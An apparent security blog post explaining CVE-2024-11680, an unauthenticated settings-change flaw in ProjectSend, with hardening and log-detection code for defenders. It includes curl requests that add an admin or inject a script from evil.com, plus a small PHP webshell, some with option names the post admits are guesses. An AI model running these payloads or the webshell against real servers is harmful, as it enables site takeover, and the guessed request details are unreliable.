Keywords: ProjectSend, CVE-2024-11680, webshell, exploit, PHP, authentication bypass, RCE
ProjectSend is a popular self-hosted PHP application for sharing files privately. In early 2024, security researchers uncovered a major vulnerability tracked as CVE-2024-11680. If you run ProjectSend before version r172, your server may be wide open to attackers.
Let's break down what this vulnerability is, how it works, and what a real-world attack might look like.
Vulnerability: Improper Authentication in ProjectSend (before r172)
- Impact: Allows unauthenticated, remote attackers to modify critical settings via crafted HTTP requests.
- Risks: Create new admin accounts, upload webshells, embed malicious JavaScript—leading to complete site takeover.
In simple terms, the flaw lets anyone change your site's config by talking directly to options.php, without needing to log in.
Why Does This Happen?
ProjectSend’s options.php file handles the site’s configuration. Older versions fail to check if the user is authenticated before applying changes. That means anyone on the Internet can just send the right kind of request and update site settings.
Here's a simplified look at the vulnerable code logic (trimmed for clarity):

```php
<?php
// options.php in vulnerable ProjectSend versions
// ...some code
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // NO login/auth check!
    $option_name = $_POST['option_name'];
    $option_value = $_POST['option_value'];
    update_option($option_name, $option_value);
}
?>
```

> Notice: There's no check like `if (user_is_authenticated())` before applying changes.
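For contrast, here is what the same request handler looks like once the missing checks are in place. This is an added example written for this post, not ProjectSend's actual patch: the helper names `user_is_authenticated()` and `update_option()` are taken from the simplified snippet above, while the session fields, `current_user_is_admin()`, the CSRF token, the option allowlist and the JSON-file storage are assumptions made for illustration.

```php
<?php
// Hardened version of the simplified options.php logic (added example, not
// ProjectSend's real code). Every POST must come from a logged-in admin, carry
// a valid CSRF token, and name an option the settings page is meant to change.
session_start();

function user_is_authenticated(): bool {
    // Assumption: a successful login stored the user id in the session.
    return !empty($_SESSION['user_id']);
}

function current_user_is_admin(): bool {
    // Assumption: the role was stored at login and "admin" marks administrators.
    return ($_SESSION['role'] ?? '') === 'admin';
}

function csrf_token_is_valid(?string $token): bool {
    // The token was embedded in the settings form when that page was rendered;
    // hash_equals() compares in constant time.
    return isset($_SESSION['csrf_token'], $token)
        && hash_equals($_SESSION['csrf_token'], $token);
}

function update_option(string $name, string $value): void {
    // Stand-in for ProjectSend's real settings storage (assumption): a JSON file.
    $file = __DIR__ . '/settings.json';
    $settings = is_file($file) ? (json_decode(file_get_contents($file), true) ?: []) : [];
    $settings[$name] = $value;
    file_put_contents($file, json_encode($settings, JSON_PRETTY_PRINT), LOCK_EX);
}

// Only options the settings page is meant to change; anything else is rejected,
// so a request can never reach user management or upload rules through this path.
const ALLOWED_OPTIONS = ['site_url', 'footer_text', 'max_upload_size'];

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // 1. Authentication and authorization before touching any setting.
    if (!user_is_authenticated() || !current_user_is_admin()) {
        http_response_code(403);
        exit('Forbidden');
    }
    // 2. CSRF check so a logged-in admin cannot be tricked into submitting this.
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // 3. Allowlist the option name; the client never picks arbitrary keys.
    $option_name  = $_POST['option_name'] ?? '';
    $option_value = $_POST['option_value'] ?? '';
    if (!in_array($option_name, ALLOWED_OPTIONS, true)) {
        http_response_code(400);
        exit('Unknown option');
    }
    // 4. Free-text settings that are rendered into HTML get their tags stripped,
    //    which closes the script-injection route described later in the post.
    if ($option_name === 'footer_text') {
        $option_value = strip_tags($option_value);
    }
    update_option($option_name, $option_value);
}
```

The order matters: the authentication and role checks run before any request data is read, the CSRF token protects legitimate admins, and the allowlist limits what a bypass of either check could reach.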
How Does The Exploit Work?
Since options.php listens for POST requests and doesn’t check for authentication, an attacker just needs to send crafted data.
Example attack using curl:

```bash
curl -X POST https://target-site.com/options.php \
  -d "option_name=site_url&option_value=evil.com"
```
But the real damage comes from tweaking more sensitive options, such as user management.
1. Create a New Admin Account
Most ProjectSend installs let admins register new accounts. By sending the right POST data, an attacker can make a new admin:
```bash
curl -X POST https://target-site.com/options.php \
  -d "option_name=add_user&option_value=eviluser|evilpass|admin|evil@hacker.com"
```
Note: The actual option/key names may differ across installations, but you get the idea—critical stuff is up for grabs!
2. Upload a Webshell
Attackers may tweak the configuration so they can upload PHP files (webshells) using ProjectSend's upload feature, especially if file type restrictions are controlled by the vulnerable options endpoint.
Sample PHP webshell (never use malicious code for illegal purposes!):

```php
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
```
Once uploaded, an attacker could browse to https://target-site.com/uploads/webshell.php?cmd=ls to run commands on your server.
3. Embed Malicious JavaScript
Change settings like the site's footer or header to include a `<script>` tag for a drive-by attack. For example:

```bash
curl -X POST https://target-site.com/options.php \
  -d "option_name=footer_text&option_value=<script src='https://evil.com/malware.js'></script>"
```
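Each of the three steps above leaves a trace in the web server's access log, which is where a defender can spot them. The script below is an added example written for this post, not part of ProjectSend: it parses combined-format log lines and flags the patterns the exploit produces (a POST to options.php that did not originate from the site's own settings form, settings changes driven by a command-line client, PHP executed out of the uploads directory, and a `cmd=` query parameter). The log lines are constructed, and the site hostname and client signatures are assumptions you would replace with your own.

```php
<?php
// Added example (not from the original post): scan access logs for the request
// patterns CVE-2024-11680 abuse produces. Sample lines are constructed.
$sample_log = <<<'LOG'
203.0.113.7 - - [26/Nov/2024:10:15:04 +0000] "POST /options.php HTTP/1.1" 200 312 "-" "curl/8.4.0"
198.51.100.4 - - [26/Nov/2024:10:16:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Nov/2024:10:17:31 +0000] "GET /uploads/webshell.php?cmd=ls HTTP/1.1" 200 98 "-" "curl/8.4.0"
198.51.100.9 - - [26/Nov/2024:10:18:02 +0000] "POST /options.php HTTP/1.1" 302 0 "https://target-site.com/options.php" "Mozilla/5.0"
LOG;

// Assumption: your own hostname, used to tell the real settings form apart
// from cross-site or scripted submissions.
const SITE_HOST = 'target-site.com';

// Parse one combined-format line into its fields; null if it does not match.
function parse_log_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[6], 'ua' => $m[7]];
}

// Return the reasons (if any) a parsed request looks like exploitation.
function suspicious_reasons(array $r): array {
    $reasons = [];
    $path  = parse_url($r['path'], PHP_URL_PATH) ?? $r['path'];
    $query = parse_url($r['path'], PHP_URL_QUERY) ?? '';
    $is_options_post = $r['method'] === 'POST' && basename($path) === 'options.php';

    // The legitimate settings form is submitted from the site itself.
    if ($is_options_post && strpos($r['referer'], SITE_HOST) === false) {
        $reasons[] = 'POST to options.php without same-site referer';
    }
    // Command-line clients are not expected to drive the admin settings page.
    if ($is_options_post && preg_match('#^(curl|python-requests|Go-http-client)#i', $r['ua'])) {
        $reasons[] = 'settings change from a scripted client';
    }
    // PHP executing out of the uploads directory is the webshell indicator.
    if (strpos($path, '/uploads/') === 0 && preg_match('/\.php\d?$/i', $path)) {
        $reasons[] = 'PHP script executed from uploads directory';
    }
    if (preg_match('/(^|&)cmd=/', $query)) {
        $reasons[] = 'cmd= parameter in query string';
    }
    return $reasons;
}

// Walk the log and collect every flagged request with its reasons.
function scan_log(string $log): array {
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parse_log_line($line);
        if ($r === null) {
            continue;
        }
        $reasons = suspicious_reasons($r);
        if ($reasons) {
            $hits[] = ['ip' => $r['ip'], 'time' => $r['time'],
                       'request' => "{$r['method']} {$r['path']}", 'reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (scan_log($sample_log) as $hit) {
    printf("%s %s %s\n  - %s\n", $hit['time'], $hit['ip'], $hit['request'],
           implode("\n  - ", $hit['reasons']));
}
```

On the constructed lines, the first and third requests are flagged (two reasons each) and the fourth, a browser submitting the settings form from the site itself, is not. Run it against a real log with `php scan.php < /dev/null` after pointing `$sample_log` at `file_get_contents('/var/log/apache2/access.log')`; the referer and user-agent heuristics will produce some noise, so treat a hit as a reason to check the session and settings history rather than as proof on its own.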
References & Patch
- CVE Details: CVE-2024-11680
- ProjectSend GitHub Security Advisory
- Patch commit fixing the bug
- Original researcher writeup
Conclusion
CVE-2024-11680 is an urgent wake-up call for anyone running ProjectSend. Without proper authentication on key config scripts, attackers can own your files and web server in minutes. Patch now, review your security, and always keep self-hosted apps updated!
Stay safe!
—Your Friendly Security Writer
*For educational purposes only. Always use this knowledge responsibly. Questions? [Contact me](mailto:security@example.com).*
Timeline
Published on: 11/26/2024 10:15:04 UTC
Last modified on: 12/06/2024 18:42:17 UTC